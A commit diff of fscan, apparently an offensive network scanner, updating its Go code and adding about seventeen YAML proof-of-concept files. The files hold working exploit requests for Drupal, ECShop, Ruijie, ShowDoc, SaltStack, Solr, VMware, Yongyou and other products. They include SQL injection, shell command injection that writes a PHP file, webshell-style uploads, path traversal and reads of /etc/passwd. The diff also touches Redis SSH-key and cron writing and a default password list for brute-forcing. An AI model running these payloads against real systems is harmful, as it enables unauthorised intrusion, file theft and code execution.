更新mod库、编码、poc等

Plugins/NetBIOS.go

@@ -137,6 +137,9 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 	nbname.msg += "-------------------------------------------\n"
 	nbname.msg += msg1 + "\n"
 	start := bytes.Index(ret, []byte("NTLMSSP"))
+	if len(ret) < start+45 {
+		return
+	}
 	num1, err = bytetoint(ret[start+40 : start+41][0])
 	if err != nil {
 		return
@@ -151,7 +154,7 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 		return
 	}
 	offset, err := bytetoint(ret[start+44 : start+45][0])
-	if err != nil {
+	if err != nil || len(ret) < start+offset+length {
 		return
 	}
 	index := start + offset
@@ -211,13 +214,16 @@ func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
 	data := text[57:]
 	var msg string
 	for i := 0; i < num; i++ {
+		if len(data) < 18*i+16 {
+			break
+		}
 		name := string(data[18*i : 18*i+15])
 		flag_bit := data[18*i+15 : 18*i+16]
 		if GROUP_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
 			msg += fmt.Sprintf("%s G %s\n", name, GROUP_NAMES[string(flag_bit)])
 		} else if UNIQUE_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
 			msg += fmt.Sprintf("%s U %s\n", name, UNIQUE_NAMES[string(flag_bit)])
-		} else if string(flag_bit) == "\x00" {
+		} else if string(flag_bit) == "\x00" || len(data) >= 18*i+18 {
 			name_flags := data[18*i+16 : 18*i+18][0]
 			if name_flags >= 128 {
 				nbname.group = strings.Replace(name, " ", "", -1)

Plugins/base.go

@@ -1,16 +1,16 @@
 package Plugins
 
 var PluginList = map[string]interface{}{
-	"21":      FtpScan,
-	"22":      SshScan,
-	"135":     Findnet,
-	"139":     NetBIOS,
-	"445":     SmbScan,
-	"1433":    MssqlScan,
-	"3306":    MysqlScan,
-	"5432":    PostgresScan,
-	"6379":    RedisScan,
-	"9200":    elasticsearchScan,
+	"21":   FtpScan,
+	"22":   SshScan,
+	"135":  Findnet,
+	"139":  NetBIOS,
+	"445":  SmbScan,
+	"1433": MssqlScan,
+	"3306": MysqlScan,
+	"5432": PostgresScan,
+	"6379": RedisScan,
+	//"9200":    elasticsearchScan,
 	"11211":   MemcachedScan,
 	"27017":   MongodbScan,
 	"1000001": MS17010,

Plugins/portscan.go

@@ -17,6 +17,22 @@ type Addr struct {
 func PortScan(hostslist []string, ports string, timeout int64) []string {
 	var AliveAddress []string
 	probePorts := common.ParsePort(ports)
+	noPorts := common.ParsePort(common.NoPorts)
+	if len(noPorts) > 0 {
+		tmp := make(map[int]struct{})
+		var tmpPorts []int
+		for _, port := range probePorts {
+			for _, noport := range noPorts {
+				if port != noport {
+					if _, ok := tmp[port]; !ok {
+						tmp[port] = struct{}{}
+						tmpPorts = append(tmpPorts, port)
+					}
+				}
+			}
+		}
+		probePorts = tmpPorts
+	}
 	workers := common.Threads
 	Addrs := make(chan Addr)
 	results := make(chan string)

Plugins/redis.go

@@ -96,15 +96,16 @@ func Expoilt(realhost string, conn net.Conn) error {
 		return err
 	}
 	if flagSsh == true {
-		result := fmt.Sprintf("Redis:%v like can write /root/.ssh/", realhost)
+		result := fmt.Sprintf("[+] Redis:%v like can write /root/.ssh/", realhost)
 		common.LogSuccess(result)
 		if common.RedisFile != "" {
 			writeok, text, err := writekey(conn, common.RedisFile)
 			if err != nil {
+				fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text))
 				return err
 			}
 			if writeok {
-				result := fmt.Sprintf("%v SSH public key was written successfully", realhost)
+				result := fmt.Sprintf("[+] %v SSH public key was written successfully", realhost)
 				common.LogSuccess(result)
 			} else {
 				fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
@@ -113,7 +114,7 @@ func Expoilt(realhost string, conn net.Conn) error {
 	}
 
 	if flagCron == true {
-		result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/", realhost)
+		result := fmt.Sprintf("[+] Redis:%v like can write /var/spool/cron/", realhost)
 		common.LogSuccess(result)
 		if common.RedisShell != "" {
 			writeok, text, err := writecron(conn, common.RedisShell)
@@ -121,10 +122,10 @@ func Expoilt(realhost string, conn net.Conn) error {
 				return err
 			}
 			if writeok {
-				result := fmt.Sprintf("%v /var/spool/cron/root was written successfully", realhost)
+				result := fmt.Sprintf("[+] %v /var/spool/cron/root was written successfully", realhost)
 				common.LogSuccess(result)
 			} else {
-				fmt.Println("Redis:", realhost, "cron write failed", text)
+				fmt.Println("[-] Redis:", realhost, "cron write failed", text)
 			}
 		}
 	}

Plugins/scanner.go

@@ -26,6 +26,7 @@ func Scan(info common.HostInfo) {
 			return
 		}
 		AlivePorts := PortScan(Hosts, info.Ports, info.Timeout)
+		fmt.Println("alive ports len is:", len(AlivePorts))
 		if info.Scantype == "portscan" {
 			return
 		}
@@ -64,7 +65,7 @@ func Scan(info common.HostInfo) {
 		}
 	}
 	wg.Wait()
-	common.Logwg.Wait()
+	common.LogWG.Wait()
 	close(common.Results)
 	fmt.Println(fmt.Sprintf("已完成 %v/%v", common.End, common.Num))
 }

Plugins/ssh.go

@@ -56,7 +56,7 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
 			flag = true
 			if info.Command != "" {
 				combo, _ := session.CombinedOutput(info.Command)
-				result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
+				result := fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
 				common.LogSuccess(result)
 			} else {
 				result := fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)

Plugins/webtitle.go

@@ -6,6 +6,7 @@ import (
 	"github.com/shadow1ng/fscan/WebScan"
 	"github.com/shadow1ng/fscan/WebScan/lib"
 	"github.com/shadow1ng/fscan/common"
+	"golang.org/x/net/html/charset"
 	"golang.org/x/text/encoding/simplifiedchinese"
 	"golang.org/x/text/transform"
 	"io/ioutil"
@@ -113,7 +114,6 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
 		res.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
 		res.Header.Set("Accept", "*/*")
 		res.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
-		res.Header.Set("Accept-Encoding", "gzip, deflate")
 		if common.Pocinfo.Cookie != "" {
 			res.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
 		} else {
@@ -167,7 +167,8 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
 						return ""
 					}
 					encoding := GetEncoding()
-					if encoding == "gbk" || encoding == "gb2312" {
+					_, charsetName, _ := charset.DetermineEncoding(body, "")
+					if encoding == "gbk" || encoding == "gb2312" || charsetName == "gbk" {
 						titleGBK, err := Decodegbk(text)
 						if err == nil {
 							title = string(titleGBK)

WebScan/info/rules.go

@@ -62,8 +62,8 @@ var RuleDatas = []RuleData{
 	{"Citrix-Access-Gateway", "code", "(Citrix Access Gateway)"},
 	{"华为 MCU", "code", "(McuR5-min.js)"},
 	{"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"},
-	{"泛微协同办公OA", "headers", "(ecology_JSessionid)"},
-	{"泛微协同办公OA", "code", "(/spa/portal/public/index.js)"},
+	{"泛微OA", "headers", "(ecology_JSessionid)"},
+	{"泛微OA", "code", "(/spa/portal/public/index.js)"},
 	{"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"},
 	{"360网站卫士", "code", "(360wzb)"},
 	{"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"},
@@ -124,6 +124,8 @@ var RuleDatas = []RuleData{
 	{"大汉版通发布系统", "code", "(大汉版通发布系统|大汉网络)"},
 	{"druid", "code", "(druid.index|DruidDrivers|DruidVersion|Druid Stat Index)"},
 	{"Jenkins", "code", "(Jenkins)"},
+	{"红帆OA", "code", "(iOffice)"},
+	{"VMware vSphere", "code", "(VMware vSphere)"},
 }
 
 var Md5Datas = []Md5Data{

WebScan/lib/check.go

@@ -67,7 +67,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
 	}
 	env, err := NewEnv(&c)
 	if err != nil {
-		//fmt.Println("environment creation error: %s\n", err)
+		//fmt.Printf("environment creation error: %s\n", err)
 		return false, err
 	}
 	req, err := ParseRequest(oReq)

WebScan/lib/eval.go

@@ -26,19 +26,19 @@ func NewEnv(c *CustomLib) (*cel.Env, error) {
 func Evaluate(env *cel.Env, expression string, params map[string]interface{}) (ref.Val, error) {
 	ast, iss := env.Compile(expression)
 	if iss.Err() != nil {
-		//fmt.Println("compile: ", iss.Err())
+		//fmt.Printf("compile: ", iss.Err())
 		return nil, iss.Err()
 	}
 
 	prg, err := env.Program(ast)
 	if err != nil {
-		//fmt.Println("Program creation error: %v", err)
+		//fmt.Printf("Program creation error: %v", err)
 		return nil, err
 	}
 
 	out, _, err := prg.Eval(params)
 	if err != nil {
-		//fmt.Println("Evaluation error: %v", err)
+		//fmt.Printf("Evaluation error: %v", err)
 		return nil, err
 	}
 	return out, nil

WebScan/lib/http.go

@@ -10,6 +10,7 @@ import (
 	"net/http"
 	"net/url"
 	"strconv"
+	"strings"
 	"time"
 )
 
@@ -39,6 +40,8 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
 	if DownProxy != "" {
 		if DownProxy == "1" {
 			DownProxy = "http://127.0.0.1:8080"
+		} else if !strings.Contains(DownProxy, "://") {
+			DownProxy = "http://127.0.0.1:" + DownProxy
 		}
 		u, err := url.Parse(DownProxy)
 		if err != nil {

WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-dlink-cve-2020-25078-account-disclosure
+rules:
+  - method: GET
+    path: >-
+      /config/getuser?index=0
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain")
+detail:
+  author: kzaopa(https://github.com/kzaopa)
+  links:
+    - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg

WebScan/pocs/drupal-cve-2018-7600-rce2.yml

@@ -0,0 +1,29 @@
+name: poc-yaml-drupal-cve-2018-7600-rce
+set:
+  r1: randomLowercase(4)
+  r2: randomLowercase(4)
+rules:
+  - method: POST
+    path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
+    search: |
+      name="form_build_id"\s+value="(?P<build_id>.+?)"
+    expression: |
+      response.status == 200
+  - method: POST
+    path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      form_build_id={{build_id}}
+    expression: |
+      response.body.bcontains(bytes(r1 + "%" + r2))
+detail:
+  links:
+    - https://github.com/dreadlocked/Drupalgeddon2
+    - https://paper.seebug.org/567/
+test:
+  target: http://cve-2018-7600-8-x.vulnet:8080/

WebScan/pocs/ecshop-rce2.yml

@@ -0,0 +1,17 @@
+name: poc-yaml-ecshop-rce
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+rules:
+  - method: POST
+    path: /user.php
+    headers:
+      Referer: >-
+       45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
+      Content-Type: application/x-www-form-urlencoded
+    body: action=login&pp123=printf({{r1}}*{{r2}});
+    expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
+detail:
+  author: 凉风(http://webkiller.cn/)
+  links:
+    - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md

WebScan/pocs/jumpserver-unauth-rce2.yml

@@ -0,0 +1,21 @@
+name: poc-yaml-jumpserver-unauth-rce
+set:
+  r1: randomLowercase(5)
+rules:
+    - method: GET
+    path: /api/v1/users/connection-token/
+    follow_redirects: false
+    expression: |
+      response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
+  - method: GET
+    path: /api/v1/users/connection-token/?user-only={{r1}}
+    follow_redirects: false
+    expression: |
+      response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
+detail:
+  author: mvhz81
+  info: jumpserver unauth read logfile + jumpserver rce
+  links:
+    - https://s.tencent.com/research/bsafe/1228.html
+    - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
+    - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh

WebScan/pocs/kingsoft-v8-file-read.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-kingsoft-v8-file-read
+rules:
+  - method: GET
+    path: >-
+      /htmltopdf/downfile.php?filename=/windows/win.ini
+    follow_redirects: false
+    expression: |
+      response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip")
+detail:
+  author: kzaopa(https://github.com/kzaopa)
+  links:
+    - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md

WebScan/pocs/ruijie-eg-rce.yml

@@ -0,0 +1,29 @@
+name: poc-yaml-ruijie-eg-rce
+set:
+  r1: randomLowercase(4)
+  r2: randomLowercase(4)
+  phpcode: >
+    "<?php echo '" + r1 + "'; unlink(__FILE__); ?>"
+  payload: base64(phpcode)
+rules:
+  - method: POST
+    path: "/guest_auth/guestIsUp.php"
+    headers:
+      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
+      Accept-Encoding: "gzip, deflate"
+      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
+    body: |
+      ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00
+    expression: |
+      response.status == 200
+  - method: GET
+    path: "/guest_auth/{{r2}}.php"
+    headers:
+      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
+      Accept-Encoding: "gzip, deflate"
+    expression: |
+      response.body.bcontains(bytes(r1))
+detail:
+  author: White(https://github.com/WhiteHSBG)
+  links:
+    - https://xz.aliyun.com/t/9016?page=1

WebScan/pocs/saltstack-cve-2021-25282-file-write.yml

@@ -0,0 +1,22 @@
+name: poc-yaml-saltstack-cve-2021-25282-file-write
+set:
+  r1: randomLowercase(5)
+rules:
+  - method: GET
+    path: /run
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async")
+  - method: POST
+    path: /run
+    headers:
+      Content-type: application/json
+    body: >-
+      {"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"}
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body)
+detail:
+  author: jweny(https://github.com/jweny)
+  links:
+    - https://www.anquanke.com/post/id/232748

WebScan/pocs/seeyon-a6-employee-info-leak.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-seeyon-a6-employee-info-leak
+rules:
+    - method: GET
+      path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
+      expression:
+        response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet")
+detail:
+  author: sakura404x
+  version: 致远A6
+  links:
+    - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md

WebScan/pocs/showdoc-uploadfile.yml

@@ -0,0 +1,25 @@
+name: poc-yaml-showdoc-uploadfile
+set:
+  r1: randomLowercase(4)
+  r2: randomLowercase(4)
+rules:
+  - method: POST
+    path: /index.php?s=/home/page/uploadImg
+    headers:
+      Content-Type: "multipart/form-data; boundary=--------------------------835846770881083140190633"
+    follow_redirects: false
+    body: "----------------------------835846770881083140190633\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\nContent-Type: text/plain\n\n<?php echo \"{{r2}}\"; unlink(__FILE__); ?>\n----------------------------835846770881083140190633--"
+    expression: |
+      response.status == 200 && response.body.bcontains(b"success")
+    search: |
+      (?P<date>\d{4}-\d{2}-\d{2})\\/(?P<file>[a-f0-9]+\.php)
+  - method: GET
+    path: /Public/Uploads/{{date}}/{{file}}
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(r2))
+detail:
+  author: White(https://github.com/WhiteHSBG)
+  Affected Version: "showdoc <= 2.8.6"
+  links:
+    - https://github.com/star7th/showdoc/pull/1059

WebScan/pocs/solr-fileread1.yml

@@ -0,0 +1,25 @@
+name: poc-yaml-solr-fileread1
+rules:
+  - method: GET
+    path: "/solr/admin/cores?indexInfo=false&wt=json"
+    expression: response.status == 200 && response.body.bcontains(b"responseHeader")
+    search: >-
+      "name":"(?P<core>.+?)"
+  - method: POST
+    path: "/solr/{{core}}/config"
+    body: |
+      {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
+    expression: |
+      response.body.bcontains(b"responseHeader")
+  - method: POST
+    path: "/solr/{{core}}/debug/dump?param=ContentStreams"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      stream.url=file:///etc/passwd
+    expression: |
+      response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body)
+detail:
+  author: whami-root(https://github.com/whami-root)
+  links:
+    - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186

WebScan/pocs/solr-fileread2.yml

@@ -0,0 +1,25 @@
+name: poc-yaml-solr-fileread2
+rules:
+  - method: GET
+    path: "/solr/admin/cores?indexInfo=false&wt=json"
+    expression: "true"
+    search: >-
+      "name":"(?P<core>.+?)"
+  - method: POST
+    path: "/solr/{{core}}/config"
+    body: |
+      {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
+    expression: |
+      response.body.bcontains(b"responseHeader")
+  - method: POST
+    path: "/solr/{{core}}/debug/dump?param=ContentStreams"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      stream.url=file:///c://windows/win.ini
+    expression: |
+      response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+detail:
+  author: whami-root(https://github.com/whami-root)
+  links:
+    - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186

WebScan/pocs/springboot-env-unauth2.yml

@@ -0,0 +1,9 @@
+name: poc-yaml-springboot-env-unauth
+rules:
+  - method: GET
+    path: /actuator/env
+    expression: |
+      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
+detail:
+  links:
+    - https://github.com/LandGrey/SpringBootVulExploit

WebScan/pocs/tongda-user-session-disclosure.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-tongda-user-session-disclosure
+rules:
+  - method: GET
+    path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
+    follow_redirects: false
+    expression: "true"
+
+  - method: POST
+    path: /general/userinfo.php?UID=1
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json")
+detail:
+  author: kzaopa(https://github.com/kzaopa)
+  links:
+    - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ

WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-vmware-vcenter-arbitrary-file-read2
+rules:
+  - method: GET
+    path: /eam/vib?id=/etc/passwd
+    follow_redirects: false
+    expression: |
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: MrP01ntSun(https://github.com/MrPointSun)
+  links:
+    - https://t.co/LfvbyBUhF5

WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf
+rules:
+  - method: POST
+    path: /casa/nodes/thumbprints
+    headers:
+      Content-Type: application/json
+    body: |
+      ["127.0.0.1:443/ui/"]
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager"))
+detail:
+  author: Loneyer
+  links:
+    - https://www.vmware.com/security/advisories/VMSA-2021-0004.html

WebScan/pocs/yongyou-u8-oa-sqli.yml

@@ -0,0 +1,13 @@
+name: poc-yaml-yongyou-u8-oa-sqli
+set:
+  rand: randomInt(200000000, 220000000)
+rules:
+  - method: GET
+    path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
+detail:
+  author: kzaopa(https://github.com/kzaopa)
+  links:
+    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html

common/config.go

@@ -10,7 +10,7 @@ var Userdict = map[string][]string{
 	"mongodb":    {"root", "admin"},
 }
 
-var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "P@ssw0rd!", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "huawei"}
+var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "P@ssw0rd!", "P@ssword", "p@ssword", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "huawei"}
 
 var PORTList = map[string]int{
 	"ftp":         21,
@@ -25,13 +25,13 @@ var PORTList = map[string]int{
 	"ms17010":     1000001,
 	"cve20200796": 1000002,
 	"web":         1000003,
-	"elastic":     9200,
-	"findnet":     135,
-	"netbios":     139,
-	"all":         0,
-	"portscan":    0,
-	"icmp":        0,
-	"main":        0,
+	//"elastic":     9200,
+	"findnet":  135,
+	"netbios":  139,
+	"all":      0,
+	"portscan": 0,
+	"icmp":     0,
+	"main":     0,
 }
 
 var Outputfile = getpath() + "result.txt"
@@ -69,18 +69,21 @@ type PocInfo struct {
 	CeyeDomain string
 }
 
-var TmpOutputfile string
-var TmpSave bool
-var IsPing bool
-var Ping bool
-var Pocinfo PocInfo
-var IsWebCan bool
-var RedisFile string
-var RedisShell string
-var Userfile string
-var Passfile string
-var HostFile string
-var Threads int
-var URL string
-var UrlFile string
-var Urls []string
+var (
+	TmpOutputfile string
+	TmpSave       bool
+	IsPing        bool
+	Ping          bool
+	Pocinfo       PocInfo
+	IsWebCan      bool
+	RedisFile     string
+	RedisShell    string
+	Userfile      string
+	Passfile      string
+	HostFile      string
+	Threads       int
+	URL           string
+	UrlFile       string
+	Urls          []string
+	NoPorts       string
+)

common/flag.go

@@ -11,7 +11,7 @@ func Banner() {
  / /_\/____/ __|/ __| '__/ _` + "`" + ` |/ __| |/ /
 / /_\\_____\__ \ (__| | | (_| | (__|   <    
 \____/     |___/\___|_|  \__,_|\___|_|\_\   
-                     fscan version: 1.5.1.2
+                     fscan version: 1.6.0
 `
 	print(banner)
 }
@@ -20,6 +20,7 @@ func Flag(Info *HostInfo) {
 	Banner()
 	flag.StringVar(&Info.Host, "h", "", "IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12")
 	flag.StringVar(&Info.Ports, "p", DefaultPorts, "Select a port,for example: 22 | 1-65535 | 22,80,3306")
+	flag.StringVar(&NoPorts, "pn", "", "the ports no scan,as: -pn 445")
 	flag.StringVar(&Info.Command, "c", "", "exec command (ssh)")
 	flag.StringVar(&Info.Domain, "domain", "", "smb domain")
 	flag.StringVar(&Info.Username, "user", "", "username")
@@ -44,6 +45,6 @@ func Flag(Info *HostInfo) {
 	flag.StringVar(&Pocinfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
 	flag.StringVar(&Pocinfo.Cookie, "cookie", "", "set poc cookie")
 	flag.Int64Var(&Pocinfo.Timeout, "wt", 5, "Set web timeout")
-	flag.IntVar(&Pocinfo.Num, "Num", 20, "poc rate")
+	flag.IntVar(&Pocinfo.Num, "num", 20, "poc rate")
 	flag.Parse()
 }

common/log.go

@@ -15,10 +15,10 @@ var Start = true
 var LogSucTime int64
 var LogErrTime int64
 var WaitTime int64
-var Logwg sync.WaitGroup
+var LogWG sync.WaitGroup
 
 func LogSuccess(result string) {
-	Logwg.Add(1)
+	LogWG.Add(1)
 	LogSucTime = time.Now().Unix()
 	if Start {
 		go SaveLog()
@@ -33,7 +33,7 @@ func SaveLog() {
 		if IsSave {
 			WriteFile(result, Outputfile)
 		}
-		Logwg.Done()
+		LogWG.Done()
 	}
 }
 

go.mod

@@ -5,14 +5,14 @@ go 1.16
 require (
 	github.com/denisenkom/go-mssqldb v0.10.0
 	github.com/go-sql-driver/mysql v1.6.0
-	github.com/golang/protobuf v1.5.2
-	github.com/google/cel-go v0.7.3
+	github.com/golang/protobuf v1.3.4
+	github.com/google/cel-go v0.6.0
 	github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067
-	github.com/lib/pq v1.10.0
+	github.com/lib/pq v1.10.1
 	github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8
-	golang.org/x/crypto v0.0.0-20210415154028-4f45737414dc
-	golang.org/x/net v0.0.0-20210420072503-d25e30425868
-	golang.org/x/text v0.3.6
-	google.golang.org/genproto v0.0.0-20210416161957-9910b6c460de
+	golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c
+	golang.org/x/net v0.0.0-20200301022130-244492dfa37a
+	golang.org/x/text v0.3.2
+	google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0
 	gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b
 )